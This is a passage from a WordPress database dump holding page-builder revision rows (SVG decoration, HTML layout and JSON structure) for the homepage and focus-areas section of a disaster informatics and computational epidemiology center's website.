d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h29\" class=\"h-x-container style-677 style-local-22-h29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h29-group style-677-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-678-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"https://gsudice.dataconn.net/about/our-mission/\"  data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-678 style-local-22-h30 position-relative\"><!----><!----> <span>our mission</span></a>\n                    </span><span class=\"h-button__outer style-679-outer style-local-22-h39-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"https://gsudice.dataconn.net/about/\"  data-colibri-id=\"22-h39\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-679 style-local-22-h39 position-relative\"><!----><!----> <span>Learn more</span></a>\n                    </span>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h31\" class=\"h-x-container style-217 style-local-22-h31 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h31-group style-217-spacing style-local-22-h31-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h32-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\"  data-colibri-id=\"22-h32\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h32 position-relative\"><!----><!----> <span>Learn More</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h33-outer\">\n            <div data-colibri-id=\"22-h33\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h33 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h34\" class=\"d-block style-221 style-local-22-h34 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h34-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h34-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-05-03 13:24:56','2022-05-03 17:24:56','',22,'https://gsudice.dataconn.net/?p=1313',0,'revision','',0),(1317,1,'2022-05-03 13:33:37','2022-05-03 17:33:37','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c5\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c7\",\"parentId\":\"20-c6\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c7\",\"index\":0,\"id\":\"20-c8\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c6\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c10\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c10\",\"index\":0,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c12\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c14\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c14\",\"index\":0,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c16\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c17\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c18\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c18\",\"index\":0,\"id\":\"20-c19\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c20\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c21\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c9\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-05-03 13:33:37','2022-05-03 17:33:37','',168,'https://gsudice.dataconn.net/?p=1317',0,'revision','',0),(1318,1,'2022-05-03 13:33:37','2022-05-03 17:33:37','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c5-outer\">\n            <div data-colibri-id=\"20-c5\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c5 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c6 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c7-outer\">\n            <div data-colibri-id=\"20-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c7 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c8\" class=\"h-global-transition-all h-heading style-334 style-local-20-c8 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-334 style-local-20-c8\">\n                    <!---->\n                    <!---->\n                    <h1 class=\"\">Focus Areas</h1>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c9\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c10-outer\">\n            <div data-colibri-id=\"20-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c11\" class=\"h-icon style-274 style-local-20-c11 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c11-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n                <div\n                  data-colibri-id=\"20-c12\" class=\"h-global-transition-all h-heading style-275 style-local-20-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n              </div>\n              <div data-colibri-id=\"20-c13\" class=\"h-text h-text-component style-276 style-local-20-c13 position-relative h-element\">\n                <!---->\n                <!---->\n                <div class=\"\">\n                  <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c14-outer\">\n          <div data-colibri-id=\"20-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c14 position-relative\">\n            <!---->\n            <!---->\n            <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n              <!---->\n              <div data-colibri-id=\"20-c15\" class=\"h-icon style-274 style-local-20-c15 position-relative h-element\">\n                <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c15-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n              <div\n                data-colibri-id=\"20-c16\" class=\"h-global-transition-all h-heading style-275 style-local-20-c16 position-relative h-element\">\n                <!---->\n                <div class=\"h-heading__outer style-275 style-local-20-c16\">\n                  <!---->\n                  <!---->\n                  <h5 class=\"\">data as a service</h5>\n                </div>\n            </div>\n            <div data-colibri-id=\"20-c17\" class=\"h-text h-text-component style-276 style-local-20-c17 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c18-outer\">\n        <div data-colibri-id=\"20-c18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c18 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"20-c19\" class=\"h-icon style-274 style-local-20-c19 position-relative h-element\">\n              <!----><span class=\"h-svg-icon h-icon__icon style-274-icon 